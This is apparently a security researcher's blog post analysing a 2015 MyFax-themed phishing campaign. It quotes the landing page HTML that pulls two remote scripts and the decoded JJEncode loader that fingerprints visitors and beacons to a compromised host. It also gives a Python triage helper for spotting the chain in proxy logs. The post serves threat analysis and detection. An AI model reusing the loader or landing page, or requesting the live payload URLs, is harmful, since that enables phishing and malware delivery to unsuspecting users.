Neonprimetime

Phishing Attempt: docs/new_fax.html [email protected]

Jan 8th, 2015

Phishing Attempt Details
Reported by neonprimetime security
http://neonprimetime.blogspot.com

****

Similar to what this blog reported: http://blog.dynamoo.com/2015/01/myfax-no-replaymy-faxcom-spam-campaign.html

****

You see an email from MyFax [[email protected]]

****

The body contains a link to a URL like the ones below. The path almost always ends with "docs/new_fax.html" (one variant in this list uses "documents/message.html" instead):

    hxxp://381main.com/docs/new_fax.html
    hxxp://blustoneentertainment.com/docs/new_fax.html
    hxxp://claimquest123.com/docs/new_fax.html
    hxxp://www.drhousesrl.it/docs/new_fax.html
    hxxp://dutawirautama.com/documents/message.html
    hxxp://espaceetconfort.free.fr/docs/new_fax.html
    hxxp://netsh105951.web13.net-server.de/docs/new_fax.html
    hxxp://njstangers.org/docs/new_fax.html
    hxxp://patresearch.com/docs/new_fax.html
    hxxp://powderroomplayground.com/docs/new_fax.html
    hxxp://prosperprogram.org/docs/new_fax.html
    hxxp://pyramidautomation.com/docs/new_fax.html
    hxxp://raffandraff.com/docs/new_fax.html
    hxxp://regimentalblues.co.uk/docs/new_fax.html
    hxxp://rewelacja.eu/docs/new_fax.html
    hxxp://stamfordicenter.com/docs/new_fax.html
    hxxp://stylista.com.cy/docs/new_fax.html
    hxxp://win.org.ro/docs/new_fax.html

        NOTE: There are many more URLs; this pastebin lists them: http://pastebin.com/uxgVykUB

***
The body of new_fax.html is always the same: an empty page whose only purpose is to load two remote scripts. The file name mimics a jQuery release so the requests look benign in logs (there is no real jQuery 1.7.50; the 1.7 branch ended at 1.7.2).

    <!DOCTYPE html>
    <html>
    <head>
      <title>Page Title</title>
    <script type="text/javascript" src="http://girardimusicstudio.com/js/jquery-1.7.50.js"></script>
    <script type="text/javascript" src="http://blackstonebikes.co.uk/js/jquery-1.7.50.js"></script>

    </head>

    <body>
    </body>

    </html>

***

The two linked JavaScript files are JJEncode-obfuscated, and what they decode to also depends on the query parameters passed to them. Decoded, they show one of the following.

With no parameters you get a loader like this (decoder output, unescaped and shown as JavaScript). It fingerprints the browser (user agent, screen width and height, platform) and, as soon as the mouse moves or after 20 seconds with no movement, injects a second script tag whose URL carries those values as query parameters:

    moved = 0;
    besend = false;
    function get_query() {
        besend = true;
        ua = navigator.userAgent;wd = screen.width;hg = screen.height;pl = navigator.platform;
        var tmp1 = document.createElement("script"); tmp1.type = "text/javascript"; tmp1.async = true;
        tmp1.src = "http://stylista.com.cy/js/jquery-1.7.50.js?t1=" + ua + "&t2=" + wd + "&t3=" + hg + "&t4=1083747684&t5=" + moved + "&t6=519.js";
        var tmp2 = document.getElementsByTagName("script")[0];
        tmp2.parentNode.insertBefore(tmp1, tmp2);
    }
    document.onmousemove = function(){moved = 1;clearTimeout(timeout);if ((!besend)) {get_query();}
    }
    timeout = setTimeout(function(){if ((!moved) && (!besend))  {get_query();besend = true}}, 20000);


This shows the parameters being passed:
t1 = ua = user agent
t2 = wd = screen width
t3 = hg = screen height
t4 = some identifying number (hardcoded in the loader, 1083747684 here)
t5 = moved = 1 if the mouse moved before the request was sent, 0 if the 20-second timeout fired first
t6 = a JavaScript file name that differs between loader variants (519.js in the loader above)

The platform value (pl) is collected but never sent. Together these values let the server distinguish a real user on a desktop browser from a sandbox, crawler or analyst's script, which typically never moves the mouse and reports an unusual screen size or user agent, and serve each a different second stage.

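The following Python is an added triage helper for this write-up; it is not code from the paste, from the blogs it links, or from the campaign. It recognises the three URL shapes in the chain (the landing page URLs listed earlier, the parameterless loader request, and the parameterised beacon), decodes the t1 through t6 values as described above, and rebuilds the second-stage URL with the same concatenation the decoded loader uses so an analyst can request the variant a real desktop user would get. The log format and the lines in SAMPLE_LOG are constructed for the example, not real captures.

```python
"""Triage helper for the MyFax "new_fax.html" chain (added example, not campaign code).

  * classify_url() recognises the three URL shapes in the chain:
      - landing page  .../docs/new_fax.html  (or .../documents/message.html)
      - loader        .../js/jquery-1.7.50.js            (no query string)
      - beacon        .../js/jquery-1.7.50.js?t1=..&t2=..&t3=..&t4=..&t5=..&t6=..
    and decodes the beacon's t1..t6 parameters.
  * build_beacon_url() reconstructs the second-stage URL exactly as the
    decoded loader concatenates it, so an analyst can fetch the variant
    served to a real desktop user (realistic UA and screen, t5=1) instead
    of the filler served to a client that never moves the mouse.

The log format and SAMPLE_LOG below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

LANDING_RE = re.compile(r"/(?:docs/new_fax|documents/message)\.html$")
LOADER_RE = re.compile(r"/js/jquery-1\.7\.50\.js$")  # no such jQuery release exists

# Constructed sample, one request per line: "<timestamp> <client_ip> <method> <url> <status>"
SAMPLE_LOG = """\
2015-01-08T10:02:11Z 10.0.0.15 GET http://stylista.com.cy/docs/new_fax.html 200
2015-01-08T10:02:12Z 10.0.0.15 GET http://girardimusicstudio.com/js/jquery-1.7.50.js 200
2015-01-08T10:02:13Z 10.0.0.15 GET http://stylista.com.cy/js/jquery-1.7.50.js?t1=Mozilla%2F5.0%20(Windows%20NT%206.1)%20AppleWebKit%2F537.36&t2=1920&t3=1080&t4=1083747684&t5=1&t6=2964.js 200
2015-01-08T10:05:40Z 10.0.0.22 GET http://example.org/js/jquery-1.7.2.min.js 200
"""


def _int_or_none(value):
    return int(value) if value.isdigit() else None


def classify_url(url):
    """Return a dict describing the URL's role in the chain, or None if unrelated."""
    parts = urlsplit(url)
    if LANDING_RE.search(parts.path):
        return {"stage": "landing", "host": parts.hostname}
    if not LOADER_RE.search(parts.path):
        return None
    if not parts.query:
        return {"stage": "loader", "host": parts.hostname}
    q = parse_qs(parts.query)

    def first(key):
        return q.get(key, [""])[0]

    return {
        "stage": "beacon",
        "host": parts.hostname,
        "user_agent": first("t1"),                      # t1 = navigator.userAgent
        "screen": (_int_or_none(first("t2")),          # t2 = screen.width
                   _int_or_none(first("t3"))),         # t3 = screen.height
        "campaign_id": first("t4"),                    # t4 = identifier hardcoded in the loader
        "mouse_moved": first("t5") == "1",             # t5 = 1 on mousemove, 0 after the 20 s timeout
        "stage_name": first("t6"),                     # t6 = per-variant second-stage name
    }


def scan_log(text):
    """Return one finding per log line whose URL belongs to the chain."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        hit = classify_url(fields[3])
        if hit:
            hit["client"] = fields[1]
            findings.append(hit)
    return findings


def build_beacon_url(host, user_agent, width, height, campaign_id, moved, stage_name):
    """Rebuild the stage-two URL in the loader's own concatenation order (no encoding, as the loader does)."""
    return ("http://%s/js/jquery-1.7.50.js?t1=%s&t2=%s&t3=%s&t4=%s&t5=%s&t6=%s"
            % (host, user_agent, width, height, campaign_id, moved, stage_name))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["stage"], f["host"], "mouse_moved=%s" % f.get("mouse_moved", "-"))
    print(build_beacon_url("stylista.com.cy",
                           "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36",
                           1920, 1080, "1083747684", 1, "519.js"))
```

A beacon with t5=0, or with a screen size or user agent that no desktop user would have, is what a sandbox detonation usually produces; when hunting in proxy logs, the landing-page and loader hits are the reliable indicators, while the beacon's parameters tell you which stage the client was probably served.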
If you request that URL with parameters you may get back nothing but filler text, e.g. for

http://stylista.com.cy/js/jquery-1.7.50.js?t1=Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36&t2=1920&t3=1080&t4=1083747684&t5=1&t6=2964.js (21.06%)

    document.write("altogether sort prevent take behind list:<li>held itself again prevent kill</li><li>held like again could grunt</li><li>fish poor straightenin much tight</li><li>some engine doubling again nursing</li><li>arms made which words sneezing</li><li>little creature hold carried leave</li><li>some legs like engine much</li><li>creature arms like first grunted</li><li>Alice hold which right leave</li><li>legs like that leave time</li>");

    document.write("keep undoing away leave behind list:<li>directions engine that sure sneezing</li><li>directions steam minute prevent Dont</li><li>like right foot loud grunted</li><li>when which this child leave</li><li>straightenin into knot keep time</li><li>shaped straightenin soon nursing open</li><li>difficulty made take away grunt</li><li>caught queer star much Dont</li>");

    document.write("shaped kept itself open this list:<li>when could soon last words</li><li>creature could open behind said</li><li>first then undoing open kill</li><li>arms itself minute knot behind</li><li>shaped much proper right dont</li><li>engine that prevent take this</li><li>some that nursing then child</li><li>queer when this time Dont</li>");

    document.write("some just thing left Dont list:<li>little creature carried take this</li><li>some snorting altogether first prevent</li><li>thought itself take sure behind</li><li>queer engine straightenin sure last</li><li>shaped altogether hold keep dont</li><li>altogether made nursing undoing behind</li><li>some poor kept that proper</li><li>when minute much nursing prevent</li><li>difficulty thing proper right murder</li><li>Alice held first away kill</li><li>Alice directions poor sneezing Dont</li>");


But sometimes, depending on the parameters, you instead get a "Read Message" link, which offers a malicious file for download, as this blog describes:
https://techhelplist.com/index.php/component/tags/tag/36-fax

So the filler text is what an automated scanner or a quick manual fetch is most likely to see; the payload is only served when the parameters look like a real user. Request the second stage with realistic values for t1 through t4 and t5=1 before concluding a URL is clean.
****